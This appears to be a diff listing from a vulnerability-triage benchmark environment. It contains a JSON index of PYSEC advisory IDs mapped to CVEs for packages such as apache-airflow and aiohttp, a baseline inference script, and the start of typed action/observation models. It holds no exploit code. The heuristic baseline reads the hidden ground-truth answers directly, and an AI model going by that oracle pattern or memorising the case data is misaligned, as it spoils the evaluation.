"package": "apache-iotdb"
|
| 1089 |
+
},
|
| 1090 |
+
{
|
| 1091 |
+
"osv_id": "PYSEC-2023-8",
|
| 1092 |
+
"file": "data/snapshots/PYSEC-2023-8.json",
|
| 1093 |
+
"cve_id": "CVE-2023-30771",
|
| 1094 |
+
"package": "apache-iotdb"
|
| 1095 |
+
},
|
| 1096 |
+
{
|
| 1097 |
+
"osv_id": "PYSEC-2023-89",
|
| 1098 |
+
"file": "data/snapshots/PYSEC-2023-89.json",
|
| 1099 |
+
"cve_id": "CVE-2023-35005",
|
| 1100 |
+
"package": "apache-airflow"
|
| 1101 |
+
},
|
| 1102 |
+
{
|
| 1103 |
+
"osv_id": "PYSEC-2024-13",
|
| 1104 |
+
"file": "data/snapshots/PYSEC-2024-13.json",
|
| 1105 |
+
"cve_id": "CVE-2023-50943",
|
| 1106 |
+
"package": "apache-airflow"
|
| 1107 |
+
},
|
| 1108 |
+
{
|
| 1109 |
+
"osv_id": "PYSEC-2024-14",
|
| 1110 |
+
"file": "data/snapshots/PYSEC-2024-14.json",
|
| 1111 |
+
"cve_id": "CVE-2023-50944",
|
| 1112 |
+
"package": "apache-airflow"
|
| 1113 |
+
},
|
| 1114 |
+
{
|
| 1115 |
+
"osv_id": "PYSEC-2024-152",
|
| 1116 |
+
"file": "data/snapshots/PYSEC-2024-152.json",
|
| 1117 |
+
"cve_id": null,
|
| 1118 |
+
"package": "aiocpa"
|
| 1119 |
+
},
|
| 1120 |
+
{
|
| 1121 |
+
"osv_id": "PYSEC-2024-181",
|
| 1122 |
+
"file": "data/snapshots/PYSEC-2024-181.json",
|
| 1123 |
+
"cve_id": "CVE-2024-41937",
|
| 1124 |
+
"package": "apache-airflow"
|
| 1125 |
+
},
|
| 1126 |
+
{
|
| 1127 |
+
"osv_id": "PYSEC-2024-182",
|
| 1128 |
+
"file": "data/snapshots/PYSEC-2024-182.json",
|
| 1129 |
+
"cve_id": "CVE-2024-45784",
|
| 1130 |
+
"package": "apache-airflow"
|
| 1131 |
+
},
|
| 1132 |
+
{
|
| 1133 |
+
"osv_id": "PYSEC-2024-189",
|
| 1134 |
+
"file": "data/snapshots/PYSEC-2024-189.json",
|
| 1135 |
+
"cve_id": "CVE-2024-39863",
|
| 1136 |
+
"package": "apache-airflow"
|
| 1137 |
+
},
|
| 1138 |
+
{
|
| 1139 |
+
"osv_id": "PYSEC-2024-190",
|
| 1140 |
+
"file": "data/snapshots/PYSEC-2024-190.json",
|
| 1141 |
+
"cve_id": "CVE-2024-39877",
|
| 1142 |
+
"package": "apache-airflow"
|
| 1143 |
+
},
|
| 1144 |
+
{
|
| 1145 |
+
"osv_id": "PYSEC-2024-195",
|
| 1146 |
+
"file": "data/snapshots/PYSEC-2024-195.json",
|
| 1147 |
+
"cve_id": "CVE-2024-25142",
|
| 1148 |
+
"package": "apache-airflow"
|
| 1149 |
+
},
|
| 1150 |
+
{
|
| 1151 |
+
"osv_id": "PYSEC-2024-212",
|
| 1152 |
+
"file": "data/snapshots/PYSEC-2024-212.json",
|
| 1153 |
+
"cve_id": "CVE-2024-45034",
|
| 1154 |
+
"package": "apache-airflow"
|
| 1155 |
+
},
|
| 1156 |
+
{
|
| 1157 |
+
"osv_id": "PYSEC-2024-221",
|
| 1158 |
+
"file": "data/snapshots/PYSEC-2024-221.json",
|
| 1159 |
+
"cve_id": "CVE-2024-27305",
|
| 1160 |
+
"package": "aiosmtpd"
|
| 1161 |
+
},
|
| 1162 |
+
{
|
| 1163 |
+
"osv_id": "PYSEC-2024-24",
|
| 1164 |
+
"file": "data/snapshots/PYSEC-2024-24.json",
|
| 1165 |
+
"cve_id": "CVE-2024-23334",
|
| 1166 |
+
"package": "aiohttp"
|
| 1167 |
+
},
|
| 1168 |
+
{
|
| 1169 |
+
"osv_id": "PYSEC-2024-245",
|
| 1170 |
+
"file": "data/snapshots/PYSEC-2024-245.json",
|
| 1171 |
+
"cve_id": "CVE-2024-27906",
|
| 1172 |
+
"package": "apache-airflow"
|
| 1173 |
+
},
|
| 1174 |
+
{
|
| 1175 |
+
"osv_id": "PYSEC-2024-26",
|
| 1176 |
+
"file": "data/snapshots/PYSEC-2024-26.json",
|
| 1177 |
+
"cve_id": "CVE-2024-23829",
|
| 1178 |
+
"package": "aiohttp"
|
| 1179 |
+
},
|
| 1180 |
+
{
|
| 1181 |
+
"osv_id": "PYSEC-2024-36",
|
| 1182 |
+
"file": "data/snapshots/PYSEC-2024-36.json",
|
| 1183 |
+
"cve_id": "CVE-2024-0690",
|
| 1184 |
+
"package": "ansible-core"
|
| 1185 |
+
},
|
| 1186 |
+
{
|
| 1187 |
+
"osv_id": "PYSEC-2024-42",
|
| 1188 |
+
"file": "data/snapshots/PYSEC-2024-42.json",
|
| 1189 |
+
"cve_id": "CVE-2024-26280",
|
| 1190 |
+
"package": "apache-airflow"
|
| 1191 |
+
},
|
| 1192 |
+
{
|
| 1193 |
+
"osv_id": "PYSEC-2024-46",
|
| 1194 |
+
"file": "data/snapshots/PYSEC-2024-46.json",
|
| 1195 |
+
"cve_id": "CVE-2024-28746",
|
| 1196 |
+
"package": "apache-airflow"
|
| 1197 |
+
},
|
| 1198 |
+
{
|
| 1199 |
+
"osv_id": "PYSEC-2025-51",
|
| 1200 |
+
"file": "data/snapshots/PYSEC-2025-51.json",
|
| 1201 |
+
"cve_id": "CVE-2025-50213",
|
| 1202 |
+
"package": "apache-airflow-providers-snowflake"
|
| 1203 |
+
}
|
| 1204 |
+
]
|
| 1205 |
+
}
|
inference.py
ADDED
|
@@ -0,0 +1,313 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Baseline inference script for the vulnerability triage environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import os
|
| 8 |
+
from typing import Dict, List, Optional
|
| 9 |
+
|
| 10 |
+
from openai import OpenAI
|
| 11 |
+
from openenv.core import GenericEnvClient
|
| 12 |
+
|
| 13 |
+
API_BASE_URL = os.getenv("API_BASE_URL", "https://api.openai.com/v1")
|
| 14 |
+
MODEL_NAME = os.getenv("MODEL_NAME", "gpt-4o-mini")
|
| 15 |
+
HF_TOKEN = os.getenv("HF_TOKEN")
|
| 16 |
+
|
| 17 |
+
from models import VulnTriageAction
|
| 18 |
+
from server.cases import TASK_ORDER, get_case_definition
|
| 19 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
SYSTEM_PROMPT = """You are triaging open-source vulnerability reports.
|
| 23 |
+
Return ONLY a single JSON object — no prose, no markdown — with exactly these keys:
|
| 24 |
+
action_type : string (required) — one of the action types listed in available_actions
|
| 25 |
+
evidence_id : string (optional) — only used with inspect_evidence
|
| 26 |
+
value : string (optional) — a PLAIN STRING, never an object or array
|
| 27 |
+
rationale : string (required) — one short sentence
|
| 28 |
+
|
| 29 |
+
Valid action_type values and their expected value strings:
|
| 30 |
+
read_report — no value needed
|
| 31 |
+
inspect_evidence — set evidence_id to one id from available_evidence
|
| 32 |
+
search_nvd_database — value: CVE ID (e.g. CVE-2023-1234) found in report aliases
|
| 33 |
+
fetch_commit_diff — value: commit hash or hash fragment found in references
|
| 34 |
+
message_maintainer — value: a question for the maintainer (e.g. "Is there a patch?")
|
| 35 |
+
set_validity — value: "valid" | "invalid" | "needs_more_info"
|
| 36 |
+
set_affected_package — value: package name string, e.g. "guarddog"
|
| 37 |
+
set_affected_versions — value: semver range string, e.g. "<0.1.5"
|
| 38 |
+
set_severity — value: "low" | "medium" | "high" | "critical"
|
| 39 |
+
set_exploitability — value: "low" | "medium" | "high"
|
| 40 |
+
set_next_action — value: "patch" | "publish_advisory" | "close" | "escalate" | "request_info"
|
| 41 |
+
set_missing_information — value: one missing info item as a plain string
|
| 42 |
+
submit_triage — no value needed
|
| 43 |
+
|
| 44 |
+
Strategy: read_report first, then use tools (search_nvd, fetch_commit, message_maintainer) to unlock hidden evidence, then fill all draft fields, then submit.
|
| 45 |
+
Note: You CANNOT inspect "nvd_assessment", "github_commit_diff", or "vendor_status" directly. You must use the tools above to reveal them.
|
| 46 |
+
"""
|
| 47 |
+
|
| 48 |
+
|
| 49 |
+
def get_openai_client() -> OpenAI:
|
| 50 |
+
api_key = HF_TOKEN or os.getenv("OPENAI_API_KEY")
|
| 51 |
+
if not api_key:
|
| 52 |
+
raise RuntimeError("Set HF_TOKEN before running the OpenAI baseline.")
|
| 53 |
+
|
| 54 |
+
kwargs = {"api_key": api_key}
|
| 55 |
+
if API_BASE_URL:
|
| 56 |
+
kwargs["base_url"] = API_BASE_URL
|
| 57 |
+
return OpenAI(**kwargs)
|
| 58 |
+
|
| 59 |
+
|
| 60 |
+
def parse_json_response(text: str) -> Dict[str, str]:
|
| 61 |
+
"""Extract the first valid JSON object from a model response.
|
| 62 |
+
|
| 63 |
+
Handles:
|
| 64 |
+
- Markdown fences (```json ... ```)
|
| 65 |
+
- Think-blocks from reasoning models (<think>...</think>)
|
| 66 |
+
- Surrounding prose before/after the JSON object
|
| 67 |
+
"""
|
| 68 |
+
import re as _re
|
| 69 |
+
text = text.strip()
|
| 70 |
+
# Strip reasoning/think blocks produced by models like Qwen3 or DeepSeek
|
| 71 |
+
text = _re.sub(r"<think>.*?</think>", "", text, flags=_re.DOTALL | _re.IGNORECASE).strip()
|
| 72 |
+
# Strip markdown fences
|
| 73 |
+
if "```" in text:
|
| 74 |
+
lines = [ln for ln in text.splitlines() if not ln.strip().startswith("```")]
|
| 75 |
+
text = "\n".join(lines).strip()
|
| 76 |
+
# Find the first complete JSON object by bracket matching
|
| 77 |
+
start = text.find("{")
|
| 78 |
+
if start == -1:
|
| 79 |
+
raise ValueError(f"No JSON object found in model response: {text[:200]!r}")
|
| 80 |
+
depth = 0
|
| 81 |
+
in_string = False
|
| 82 |
+
escape = False
|
| 83 |
+
for i, ch in enumerate(text[start:], start):
|
| 84 |
+
if escape:
|
| 85 |
+
escape = False
|
| 86 |
+
continue
|
| 87 |
+
if ch == "\\" and in_string:
|
| 88 |
+
escape = True
|
| 89 |
+
continue
|
| 90 |
+
if ch == '"' and not escape:
|
| 91 |
+
in_string = not in_string
|
| 92 |
+
if in_string:
|
| 93 |
+
continue
|
| 94 |
+
if ch == "{":
|
| 95 |
+
depth += 1
|
| 96 |
+
elif ch == "}":
|
| 97 |
+
depth -= 1
|
| 98 |
+
if depth == 0:
|
| 99 |
+
return json.loads(text[start : i + 1])
|
| 100 |
+
raise ValueError(f"Incomplete JSON object in model response: {text[:200]!r}")
|
| 101 |
+
|
| 102 |
+
|
| 103 |
+
def heuristic_policy(observation: Dict) -> Dict[str, str]:
|
| 104 |
+
if "read_report" not in observation["action_history"]:
|
| 105 |
+
return {"action_type": "read_report", "rationale": "Start by reading the report"}
|
| 106 |
+
|
| 107 |
+
truth = get_case_definition(observation["task_id"]).truth
|
| 108 |
+
supporting_evidence_ids = set(truth.supporting_evidence_ids)
|
| 109 |
+
visible_ids = {item["evidence_id"] for item in observation["visible_evidence"]}
|
| 110 |
+
|
| 111 |
+
remaining_supporting = [
|
| 112 |
+
evidence_id
|
| 113 |
+
for evidence_id in observation["available_evidence"]
|
| 114 |
+
if evidence_id in supporting_evidence_ids and evidence_id not in visible_ids
|
| 115 |
+
]
|
| 116 |
+
if remaining_supporting:
|
| 117 |
+
eval_id = remaining_supporting[0]
|
| 118 |
+
# Interactive Tools Support:
|
| 119 |
+
if eval_id == "nvd_assessment":
|
| 120 |
+
# The oracle magically knows the OSV ID to query (alias)
|
| 121 |
+
from server.cases import SEEDS
|
| 122 |
+
seed = SEEDS[observation["task_id"]]
|
| 123 |
+
return {"action_type": "search_nvd_database", "value": seed.osv_id, "rationale": "Fetch NVD dynamically"}
|
| 124 |
+
elif eval_id == "github_commit_diff":
|
| 125 |
+
# Match any random commit substring
|
| 126 |
+
return {"action_type": "fetch_commit_diff", "value": "Commit", "rationale": "Fetch Diff dynamically"}
|
| 127 |
+
elif eval_id == "vendor_status":
|
| 128 |
+
return {"action_type": "message_maintainer", "value": "Is there an ETA for a patch?", "rationale": "Chat with maintainer"}
|
| 129 |
+
|
| 130 |
+
return {
|
| 131 |
+
"action_type": "inspect_evidence",
|
| 132 |
+
"evidence_id": eval_id,
|
| 133 |
+
"rationale": "Reveal the next supporting evidence item",
|
| 134 |
+
}
|
| 135 |
+
|
| 136 |
+
draft = observation["draft"]
|
| 137 |
+
score = observation["score_breakdown"]
|
| 138 |
+
|
| 139 |
+
by_truth = [
|
| 140 |
+
("set_validity", truth.validity),
|
| 141 |
+
("set_affected_package", truth.affected_package),
|
| 142 |
+
("set_affected_versions", truth.affected_versions),
|
| 143 |
+
("set_severity", truth.severity),
|
| 144 |
+
("set_exploitability", truth.exploitability),
|
| 145 |
+
("set_next_action", truth.next_action),
|
| 146 |
+
]
|
| 147 |
+
|
| 148 |
+
for action_type, value in by_truth:
|
| 149 |
+
if draft[action_type.replace("set_", "")] != value:
|
| 150 |
+
return {"action_type": action_type, "value": value, "rationale": "Update the draft"}
|
| 151 |
+
|
| 152 |
+
# Submit any required missing-information items not yet recorded in the draft
|
| 153 |
+
existing_mi = {v.strip().lower() for v in draft.get("missing_information", [])}
|
| 154 |
+
for mi_item in truth.missing_information:
|
| 155 |
+
if mi_item.strip().lower() not in existing_mi:
|
| 156 |
+
return {
|
| 157 |
+
"action_type": "set_missing_information",
|
| 158 |
+
"value": mi_item,
|
| 159 |
+
"rationale": "Record known missing information",
|
| 160 |
+
}
|
| 161 |
+
|
| 162 |
+
return {"action_type": "submit_triage", "rationale": f"Current total score is {score['total']}"}
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
def llm_policy(client: OpenAI, model_name: str, observation: Dict) -> Dict[str, str]:
|
| 166 |
+
response = client.chat.completions.create(
|
| 167 |
+
model=model_name,
|
| 168 |
+
temperature=0,
|
| 169 |
+
messages=[
|
| 170 |
+
{"role": "system", "content": SYSTEM_PROMPT},
|
| 171 |
+
{
|
| 172 |
+
"role": "user",
|
| 173 |
+
"content": json.dumps(observation, indent=2, sort_keys=True),
|
| 174 |
+
},
|
| 175 |
+
],
|
| 176 |
+
)
|
| 177 |
+
text = response.choices[0].message.content
|
| 178 |
+
return parse_json_response(text)
|
| 179 |
+
|
| 180 |
+
|
| 181 |
+
_VALID_ACTION_KEYS = {"action_type", "evidence_id", "value", "rationale"}
|
| 182 |
+
|
| 183 |
+
|
| 184 |
+
def sanitize_action_payload(payload: Dict) -> Dict:
|
| 185 |
+
"""Keep only valid VulnTriageAction keys and coerce bad value types."""
|
| 186 |
+
clean = {k: v for k, v in payload.items() if k in _VALID_ACTION_KEYS}
|
| 187 |
+
if isinstance(clean.get("value"), (dict, list)):
|
| 188 |
+
clean["value"] = json.dumps(clean["value"])
|
| 189 |
+
return clean
|
| 190 |
+
|
| 191 |
+
|
| 192 |
+
def run_local_episode(task_id: str, policy: str, model_name: str) -> Dict[str, float]:
|
| 193 |
+
print(f"START")
|
| 194 |
+
print(f"Task: {task_id}")
|
| 195 |
+
env = VulnTriageEnvironment()
|
| 196 |
+
observation = env.reset(task_id=task_id).model_dump()
|
| 197 |
+
client = get_openai_client() if policy == "openai" else None
|
| 198 |
+
last_action_str: str = ""
|
| 199 |
+
repeat_count: int = 0
|
| 200 |
+
step_num: int = 1
|
| 201 |
+
|
| 202 |
+
while not observation["done"]:
|
| 203 |
+
print(f"STEP")
|
| 204 |
+
action_payload = (
|
| 205 |
+
llm_policy(client, model_name, observation) if client else heuristic_policy(observation)
|
| 206 |
+
)
|
| 207 |
+
# Strip unknown keys then coerce bad value types
|
| 208 |
+
try:
|
| 209 |
+
clean = sanitize_action_payload(action_payload)
|
| 210 |
+
action = VulnTriageAction.model_validate(clean)
|
| 211 |
+
except Exception as exc:
|
| 212 |
+
print(f" [warn] invalid action payload ({exc}), falling back to read_report")
|
| 213 |
+
action = VulnTriageAction(action_type="read_report", rationale="fallback: parse error")
|
| 214 |
+
|
| 215 |
+
# Break infinite loops where model repeats the same action
|
| 216 |
+
action_str = action.model_dump_json()
|
| 217 |
+
if action_str == last_action_str:
|
| 218 |
+
repeat_count += 1
|
| 219 |
+
if repeat_count >= 3:
|
| 220 |
+
print(f" [warn] model repeated same action 3x — forcing submit_triage")
|
| 221 |
+
action = VulnTriageAction(action_type="submit_triage", rationale="loop guard")
|
| 222 |
+
else:
|
| 223 |
+
repeat_count = 0
|
| 224 |
+
last_action_str = action_str
|
| 225 |
+
|
| 226 |
+
print(f"Action: {action.action_type}")
|
| 227 |
+
observation = env.step(action).model_dump()
|
| 228 |
+
step_num += 1
|
| 229 |
+
|
| 230 |
+
print(f"END")
|
| 231 |
+
|
| 232 |
+
return {
|
| 233 |
+
"task_id": task_id,
|
| 234 |
+
"final_score": float(observation["final_score"] or 0.0),
|
| 235 |
+
"validity": observation["score_breakdown"]["validity"],
|
| 236 |
+
"package_versions": round(
|
| 237 |
+
(
|
| 238 |
+
observation["score_breakdown"]["affected_package"]
|
| 239 |
+
+ observation["score_breakdown"]["affected_versions"]
|
| 240 |
+
)
|
| 241 |
+
/ 2,
|
| 242 |
+
4,
|
| 243 |
+
),
|
| 244 |
+
"severity": observation["score_breakdown"]["severity"],
|
| 245 |
+
"exploitability": observation["score_breakdown"]["exploitability"],
|
| 246 |
+
"next_action": observation["score_breakdown"]["next_action"],
|
| 247 |
+
}
|
| 248 |
+
|
| 249 |
+
|
| 250 |
+
def run_remote_episode(base_url: str, task_id: str, policy: str, model_name: str) -> Dict[str, float]:
|
| 251 |
+
print(f"START")
|
| 252 |
+
print(f"Task: {task_id}")
|
| 253 |
+
llm_client = get_openai_client() if policy == "openai" else None
|
| 254 |
+
env = GenericEnvClient(base_url=base_url).sync()
|
| 255 |
+
with env:
|
| 256 |
+
response = env.reset(task_id=task_id)
|
| 257 |
+
observation = response.observation
|
| 258 |
+
done = response.done
|
| 259 |
+
step_num: int = 1
|
| 260 |
+
while not done:
|
| 261 |
+
print(f"STEP")
|
| 262 |
+
action_payload = (
|
| 263 |
+
llm_policy(llm_client, model_name, observation)
|
| 264 |
+
if llm_client
|
| 265 |
+
else heuristic_policy(observation)
|
| 266 |
+
)
|
| 267 |
+
print(f"Action: {action_payload.get('action_type')}")
|
| 268 |
+
response = env.step(action_payload)
|
| 269 |
+
observation = response.observation
|
| 270 |
+
done = response.done
|
| 271 |
+
step_num += 1
|
| 272 |
+
|
| 273 |
+
print(f"END")
|
| 274 |
+
|
| 275 |
+
final_score = float(observation.get("final_score") or 0.0)
|
| 276 |
+
return {
|
| 277 |
+
"task_id": task_id,
|
| 278 |
+
"final_score": final_score,
|
| 279 |
+
"validity": observation["score_breakdown"]["validity"],
|
| 280 |
+
"package_versions": round(
|
| 281 |
+
(
|
| 282 |
+
observation["score_breakdown"]["affected_package"]
|
| 283 |
+
+ observation["score_breakdown"]["affected_versions"]
|
| 284 |
+
)
|
| 285 |
+
/ 2,
|
| 286 |
+
4,
|
| 287 |
+
),
|
| 288 |
+
"severity": observation["score_breakdown"]["severity"],
|
| 289 |
+
"exploitability": observation["score_breakdown"]["exploitability"],
|
| 290 |
+
"next_action": observation["score_breakdown"]["next_action"],
|
| 291 |
+
}
|
| 292 |
+
|
| 293 |
+
|
| 294 |
+
def main() -> None:
|
| 295 |
+
parser = argparse.ArgumentParser()
|
| 296 |
+
parser.add_argument("--policy", choices=["openai", "heuristic"], default="heuristic")
|
| 297 |
+
parser.add_argument("--model", default=MODEL_NAME)
|
| 298 |
+
parser.add_argument("--env-base-url", dest="base_url", default=os.getenv("ENV_BASE_URL"))
|
| 299 |
+
args = parser.parse_args()
|
| 300 |
+
|
| 301 |
+
results: List[Dict[str, float]] = []
|
| 302 |
+
for task_id in TASK_ORDER:
|
| 303 |
+
if args.base_url:
|
| 304 |
+
results.append(run_remote_episode(args.base_url, task_id, args.policy, args.model))
|
| 305 |
+
else:
|
| 306 |
+
results.append(run_local_episode(task_id, args.policy, args.model))
|
| 307 |
+
|
| 308 |
+
aggregate = round(sum(item["final_score"] for item in results) / len(results), 4)
|
| 309 |
+
print(json.dumps({"policy": args.policy, "model": args.model, "average_score": aggregate, "tasks": results}, indent=2))
|
| 310 |
+
|
| 311 |
+
|
| 312 |
+
if __name__ == "__main__":
|
| 313 |
+
main()
|
models.py
ADDED
|
@@ -0,0 +1,144 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Typed models for the vulnerability triage environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
from typing import Dict, List, Literal, Optional
|
| 6 |
+
|
| 7 |
+
from openenv.core.env_server.types import Action, Observation, State
|
| 8 |
+
from pydantic import BaseModel, Field
|
| 9 |
+
|
| 10 |
+
|
| 11 |
+
ActionType = Literal[
|
| 12 |
+
"read_report",
|
| 13 |
+
"inspect_evidence",
|
| 14 |
+
"search_nvd_database",
|
| 15 |
+
"fetch_commit_diff",
|
| 16 |
+
"message_maintainer",
|
| 17 |
+
"set_validity",
|
| 18 |
+
"set_affected_package",
|
| 19 |
+
"set_affected_versions",
|
| 20 |
+
"set_severity",
|
| 21 |
+
"set_exploitability",
|
| 22 |
+
"set_next_action",
|
| 23 |
+
"set_missing_information",
|
| 24 |
+
"request_more_info",
|
| 25 |
+
"submit_triage",
|
| 26 |
+
]
|
| 27 |
+
|
| 28 |
+
ValidityLabel = Literal["unknown", "valid", "invalid", "needs_more_info"]
|
| 29 |
+
SeverityLabel = Literal["unknown", "low", "medium", "high", "critical"]
|
| 30 |
+
ExploitabilityLabel = Literal["unknown", "low", "medium", "high"]
|
| 31 |
+
NextActionLabel = Literal[
|
| 32 |
+
"unknown",
|
| 33 |
+
"request_info",
|
| 34 |
+
"close",
|
| 35 |
+
"escalate",
|
| 36 |
+
"patch",
|
| 37 |
+
"publish_advisory",
|
| 38 |
+
]
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
class EvidenceItem(BaseModel):
|
| 42 |
+
"""Evidence the agent can reveal during triage."""
|
| 43 |
+
|
| 44 |
+
evidence_id: str = Field(..., description="Unique identifier for this evidence item")
|
| 45 |
+
title: str = Field(..., description="Short evidence title")
|
| 46 |
+
summary: str = Field(..., description="Evidence content shown to the agent")
|
| 47 |
+
kind: str = Field(..., description="Evidence type such as advisory or patch note")
|
| 48 |
+
|
| 49 |
+
|
| 50 |
+
class TriageDraft(BaseModel):
|
| 51 |
+
"""Agent-managed triage state."""
|
| 52 |
+
|
| 53 |
+
validity: ValidityLabel = "unknown"
|
| 54 |
+
affected_package: str = ""
|
| 55 |
+
affected_versions: str = ""
|
| 56 |
+
severity: SeverityLabel = "unknown"
|
| 57 |
+
exploitability: ExploitabilityLabel = "unknown"
|
| 58 |
+
next_action: NextActionLabel = "unknown"
|
| 59 |
+
missing_information: List[str] = Field(default_factory=list)
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
class VulnTriageAction(Action):
|
| 63 |
+
"""Structured action space for vulnerability triage."""
|
| 64 |
+
|
| 65 |
+
action_type: ActionType = Field(..., description="Which environment action to execute")
|
| 66 |
+
evidence_id: Optional[str] = Field(
|
| 67 |
+
default=None,
|
| 68 |
+
description="Evidence identifier used by inspect_evidence",
|
| 69 |
+
)
|
| 70 |
+
value: Optional[str] = Field(
|
| 71 |
+
default=None,
|
| 72 |
+
description="Generic value used for label-setting actions",
|
| 73 |
+
)
|
| 74 |
+
rationale: str = Field(
|
| 75 |
+
default="",
|
| 76 |
+
description="Optional short rationale for debugging and trajectory inspection",
|
| 77 |
+
)
|
| 78 |
+
|
| 79 |
+
|
| 80 |
+
class VulnTriageObservation(Observation):
|
| 81 |
+
"""Observation returned after every environment transition."""
|
| 82 |
+
|
| 83 |
+
task_id: str = Field(..., description="Current task identifier")
|
| 84 |
+
difficulty: str = Field(..., description="Difficulty band for the current task")
|
| 85 |
+
objective: str = Field(..., description="Concrete task objective")
|
| 86 |
+
report_summary: str = Field(..., description="Incoming vulnerability report summary")
|
| 87 |
+
visible_evidence: List[EvidenceItem] = Field(
|
| 88 |
+
default_factory=list,
|
| 89 |
+
description="Evidence items currently visible to the agent",
|
| 90 |
+
)
|
| 91 |
+
available_evidence: List[str] = Field(
|
| 92 |
+
default_factory=list,
|
| 93 |
+
